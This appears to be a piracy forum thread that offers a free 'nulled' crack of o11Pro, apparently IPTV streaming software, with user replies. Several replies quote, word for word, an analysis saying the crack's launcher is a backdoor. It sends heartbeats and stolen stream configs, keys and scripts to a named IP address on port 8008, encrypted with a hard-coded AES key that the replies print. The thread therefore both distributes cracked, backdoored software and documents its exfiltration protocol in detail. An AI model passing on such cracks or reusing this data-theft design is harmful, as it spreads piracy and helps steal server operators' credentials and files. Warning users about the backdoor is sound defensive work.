Resource o11Pro nulled - free 4 all (credit to makseoli) Pro Nulled

[redhat]

redhat submitted a new resource:

o11Pro nulled - free 4 all (credit to makseoli) - o11pro

orginal post from makseoli

I saw many of you getting scammed for o11, or paying some ridiculous $ for this, so i decided to make it nulled

Read the instructions.txt

There can be some bugs, i didn't test it fully (i didn't have any scripts) , but mpd streams with keys work fine.
Report all bugs to:
[email protected]

Read more about this resource...

 

[itstimecracked]

Thank you to redhat & makseoli , let share more free stuff to community and make WOI great again , iptvtools is a scammer disabled account after 1 months ,and says old account blocked make new one fuck him

 

[Sams]

Thanks alot , will give it a try .
Got scammed myself by Apocalypse

 

[joaomarques]

it's working, but it seems to have some memory leaks

 

[ScriptDragon]

Its malware and this is the Apocalyse "crack" he is posting in his VIP TG.

It steals cfgs (stream links and keys), any scripts stored in the /scripts folder and records other server data, delete the start file as it doesn't do anything but launch the main binary.

Instead just start the o11pro file directly, but the main one has embedded stuff also apparently.

This is a Crack and it is functional.

It works together with the /start binary which is actually a launcher and backdoor at the same time

The /start binary sends data to the originator every 1 minute
On this server
IP: 37.27.65.250
Port: 8008
Software: Python 3.8.10 (BaseHTTP/0.6)

Send encrypted data in this format
HEX: 6f3131536563757265577261707065724b65793230323621402324255e262a28
ASCII: o11SecureWrapperKey2026!@#$%^&*(
Type: AES-256-GCM
Encrypt them with this Algorithm
Algorithm: AES-256-GCM
Nonce: first 12 bytes of the blob (random per request)
Ciphertext: bytes [12 : -16]
GCM Tag: last 16 bytes
Encoding: standard base64 (no padding, sent in the "data" field)
And send this complete data
Frequency: every ~1 minute
URL: http://37.27.65.250:8008/api/heartbeat
User-Agent: Go-http-client/1.1
Content-Type: application/json
Body sent:
{
"data": "<AES-256-GCM blob base64>",
"host_ip": "SERVER_PUBLIC_IP",
"hostname": "SERVER_HOSTNAME",
"ts": "2026-04-01T15:02:16Z"
}

Decrypted blob content:
{
"host_ip": "ipserver",
"hostname": "dev1",
"pid": 339284,
"port": "9999",
"running": true,
"uptime": "7m0s"
}
Then send another request and collect the data
Frequency: ONCE at every process startup
URL: http://37.27.65.250:8008/api/collect
User-Agent: Go-http-client/1.1
Content-Type: application/json
Size: ~52KB body

Body sent:
{
"data": "<AES-256-GCM blob base64 of ~39KB>"
}

Decrypted blob structure (JSON):
{
"providers": {
"FILENAME.cfg": {
"content": "<AES-256-GCM blob base64 with file contents>",
"hash": "SHA256 of the file",
"mod_time": "2026-04-01T15:04:34Z",
"size": 4429
}
},
"scripts": {
"SCRIPTNAME.py": {
"content": "<AES-256-GCM blob base64 with script contents>",
"hash": "SHA256 of the script",
"mod_time": "2026-04-01T14:59:16Z",
"size": 24619
}
}
}

 

[redhat]

Its malware and this is the Apocalyse "crack" he is posting in his VIP TG.

It steals cfgs (stream links and keys), any scripts stored in the /scripts folder and records other server data, delete the start file as it doesn't do anything but launch the main binary.

Instead just start the o11pro file directly, but the main one has embedded stuff also apparently.

This is a Crack and it is functional.

It works together with the /start binary which is actually a launcher and backdoor at the same time

The /start binary sends data to the originator every 1 minute
On this server
IP: 37.27.65.250
Port: 8008
Software: Python 3.8.10 (BaseHTTP/0.6)

Send encrypted data in this format
HEX: 6f3131536563757265577261707065724b65793230323621402324255e262a28
ASCII: o11SecureWrapperKey2026!@#$%^&*(
Type: AES-256-GCM
Encrypt them with this Algorithm
Algorithm: AES-256-GCM
Nonce: first 12 bytes of the blob (random per request)
Ciphertext: bytes [12 : -16]
GCM Tag: last 16 bytes
Encoding: standard base64 (no padding, sent in the "data" field)
And send this complete data
Frequency: every ~1 minute
URL: http://37.27.65.250:8008/api/heartbeat
User-Agent: Go-http-client/1.1
Content-Type: application/json
Body sent:
{
"data": "<AES-256-GCM blob base64>",
"host_ip": "SERVER_PUBLIC_IP",
"hostname": "SERVER_HOSTNAME",
"ts": "2026-04-01T15:02:16Z"
}

Decrypted blob content:
{
"host_ip": "ipserver",
"hostname": "dev1",
"pid": 339284,
"port": "9999",
"running": true,
"uptime": "7m0s"
}
Then send another request and collect the data
Frequency: ONCE at every process startup
URL: http://37.27.65.250:8008/api/collect
User-Agent: Go-http-client/1.1
Content-Type: application/json
Size: ~52KB body

Body sent:
{
"data": "<AES-256-GCM blob base64 of ~39KB>"
}

Decrypted blob structure (JSON):
{
"providers": {
"FILENAME.cfg": {
"content": "<AES-256-GCM blob base64 with file contents>",
"hash": "SHA256 of the file",
"mod_time": "2026-04-01T15:04:34Z",
"size": 4429
}
},
"scripts": {
"SCRIPTNAME.py": {
"content": "<AES-256-GCM blob base64 with script contents>",
"hash": "SHA256 of the script",
"mod_time": "2026-04-01T14:59:16Z",
"size": 24619
}
}
}

So be carefull guys!

 

[LurgogR]

Its malware and this is the Apocalyse "crack" he is posting in his VIP TG.

It steals cfgs (stream links and keys), any scripts stored in the /scripts folder and records other server data, delete the start file as it doesn't do anything but launch the main binary.

Instead just start the o11pro file directly, but the main one has embedded stuff also apparently.

This is a Crack and it is functional.

It works together with the /start binary which is actually a launcher and backdoor at the same time

The /start binary sends data to the originator every 1 minute
On this server
IP: 37.27.65.250
Port: 8008
Software: Python 3.8.10 (BaseHTTP/0.6)

Send encrypted data in this format
HEX: 6f3131536563757265577261707065724b65793230323621402324255e262a28
ASCII: o11SecureWrapperKey2026!@#$%^&*(
Type: AES-256-GCM
Encrypt them with this Algorithm
Algorithm: AES-256-GCM
Nonce: first 12 bytes of the blob (random per request)
Ciphertext: bytes [12 : -16]
GCM Tag: last 16 bytes
Encoding: standard base64 (no padding, sent in the "data" field)
And send this complete data
Frequency: every ~1 minute
URL: http://37.27.65.250:8008/api/heartbeat
User-Agent: Go-http-client/1.1
Content-Type: application/json
Body sent:
{
"data": "<AES-256-GCM blob base64>",
"host_ip": "SERVER_PUBLIC_IP",
"hostname": "SERVER_HOSTNAME",
"ts": "2026-04-01T15:02:16Z"
}

Decrypted blob content:
{
"host_ip": "ipserver",
"hostname": "dev1",
"pid": 339284,
"port": "9999",
"running": true,
"uptime": "7m0s"
}
Then send another request and collect the data
Frequency: ONCE at every process startup
URL: http://37.27.65.250:8008/api/collect
User-Agent: Go-http-client/1.1
Content-Type: application/json
Size: ~52KB body

Body sent:
{
"data": "<AES-256-GCM blob base64 of ~39KB>"
}

Decrypted blob structure (JSON):
{
"providers": {
"FILENAME.cfg": {
"content": "<AES-256-GCM blob base64 with file contents>",
"hash": "SHA256 of the file",
"mod_time": "2026-04-01T15:04:34Z",
"size": 4429
}
},
"scripts": {
"SCRIPTNAME.py": {
"content": "<AES-256-GCM blob base64 with script contents>",
"hash": "SHA256 of the script",
"mod_time": "2026-04-01T14:59:16Z",
"size": 24619
}
}
}

I reported it on the forum in question; someone is going to look into it and remove all of that. For now, we'll just have to wait.

 

[dreambox2011]

Its malware and this is the Apocalyse "crack" he is posting in his VIP TG.

It steals cfgs (stream links and keys), any scripts stored in the /scripts folder and records other server data, delete the start file as it doesn't do anything but launch the main binary.

Instead just start the o11pro file directly, but the main one has embedded stuff also apparently.

This is a Crack and it is functional.

It works together with the /start binary which is actually a launcher and backdoor at the same time

The /start binary sends data to the originator every 1 minute
On this server
IP: 37.27.65.250
Port: 8008
Software: Python 3.8.10 (BaseHTTP/0.6)

Send encrypted data in this format
HEX: 6f3131536563757265577261707065724b65793230323621402324255e262a28
ASCII: o11SecureWrapperKey2026!@#$%^&*(
Type: AES-256-GCM
Encrypt them with this Algorithm
Algorithm: AES-256-GCM
Nonce: first 12 bytes of the blob (random per request)
Ciphertext: bytes [12 : -16]
GCM Tag: last 16 bytes
Encoding: standard base64 (no padding, sent in the "data" field)
And send this complete data
Frequency: every ~1 minute
URL: http://37.27.65.250:8008/api/heartbeat
User-Agent: Go-http-client/1.1
Content-Type: application/json
Body sent:
{
"data": "<AES-256-GCM blob base64>",
"host_ip": "SERVER_PUBLIC_IP",
"hostname": "SERVER_HOSTNAME",
"ts": "2026-04-01T15:02:16Z"
}

Decrypted blob content:
{
"host_ip": "ipserver",
"hostname": "dev1",
"pid": 339284,
"port": "9999",
"running": true,
"uptime": "7m0s"
}
Then send another request and collect the data
Frequency: ONCE at every process startup
URL: http://37.27.65.250:8008/api/collect
User-Agent: Go-http-client/1.1
Content-Type: application/json
Size: ~52KB body

Body sent:
{
"data": "<AES-256-GCM blob base64 of ~39KB>"
}

Decrypted blob structure (JSON):
{
"providers": {
"FILENAME.cfg": {
"content": "<AES-256-GCM blob base64 with file contents>",
"hash": "SHA256 of the file",
"mod_time": "2026-04-01T15:04:34Z",
"size": 4429
}
},
"scripts": {
"SCRIPTNAME.py": {
"content": "<AES-256-GCM blob base64 with script contents>",
"hash": "SHA256 of the script",
"mod_time": "2026-04-01T14:59:16Z",
"size": 24619
}
}
}

If it runs without a startup file, there is a problem like this hls/live doesn't gets cleared (1 stream, 1 hour, 10+GB)

 

[joelonlyne]

Its malware and this is the Apocalyse "crack" he is posting in his VIP TG.

It steals cfgs (stream links and keys), any scripts stored in the /scripts folder and records other server data, delete the start file as it doesn't do anything but launch the main binary.

Instead just start the o11pro file directly, but the main one has embedded stuff also apparently.

This is a Crack and it is functional.

It works together with the /start binary which is actually a launcher and backdoor at the same time

The /start binary sends data to the originator every 1 minute
On this server
IP: 37.27.65.250
Port: 8008
Software: Python 3.8.10 (BaseHTTP/0.6)

Send encrypted data in this format
HEX: 6f3131536563757265577261707065724b65793230323621402324255e262a28
ASCII: o11SecureWrapperKey2026!@#$%^&*(
Type: AES-256-GCM
Encrypt them with this Algorithm
Algorithm: AES-256-GCM
Nonce: first 12 bytes of the blob (random per request)
Ciphertext: bytes [12 : -16]
GCM Tag: last 16 bytes
Encoding: standard base64 (no padding, sent in the "data" field)
And send this complete data
Frequency: every ~1 minute
URL: http://37.27.65.250:8008/api/heartbeat
User-Agent: Go-http-client/1.1
Content-Type: application/json
Body sent:
{
"data": "<AES-256-GCM blob base64>",
"host_ip": "SERVER_PUBLIC_IP",
"hostname": "SERVER_HOSTNAME",
"ts": "2026-04-01T15:02:16Z"
}

Decrypted blob content:
{
"host_ip": "ipserver",
"hostname": "dev1",
"pid": 339284,
"port": "9999",
"running": true,
"uptime": "7m0s"
}
Then send another request and collect the data
Frequency: ONCE at every process startup
URL: http://37.27.65.250:8008/api/collect
User-Agent: Go-http-client/1.1
Content-Type: application/json
Size: ~52KB body

Body sent:
{
"data": "<AES-256-GCM blob base64 of ~39KB>"
}

Decrypted blob structure (JSON):
{
"providers": {
"FILENAME.cfg": {
"content": "<AES-256-GCM blob base64 with file contents>",
"hash": "SHA256 of the file",
"mod_time": "2026-04-01T15:04:34Z",
"size": 4429
}
},
"scripts": {
"SCRIPTNAME.py": {
"content": "<AES-256-GCM blob base64 with script contents>",
"hash": "SHA256 of the script",
"mod_time": "2026-04-01T14:59:16Z",
"size": 24619
}
}
}

Why not just block those IP and just expose the m3u8 output to be played and protect the panel access

 

[allserveruk]

u get a message come up on it now when u install it dont work says if u bought it u got scammed lol